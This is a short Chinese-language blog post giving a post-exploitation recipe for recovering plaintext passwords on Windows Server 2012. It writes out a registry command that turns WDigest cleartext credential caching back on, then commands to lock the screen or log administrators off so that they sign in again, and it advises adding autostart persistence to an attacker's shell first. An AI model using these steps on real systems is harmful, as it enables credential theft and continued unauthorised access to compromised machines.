windows2012获取明文密码

windows 2012获取明文密码

导hash的话用常规的方法就可以。

修改注册表
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\ /v UseLogonCredential /t REG_DWORD /d 1

选项一:锁屏

rundll32.exe user32.dll,LockWorkStation
选项二:注销

查询已登录用户的会话ID

query user
把你想抓的那个管理员注销掉或者把所有在线用户全部注销掉,注意:可能会导致shell无法访问,执行前先给shell加个自启动

logoff ID

posted @ 2019-07-01 14:36  轻落语  阅读(1190)  评论(0编辑  收藏  举报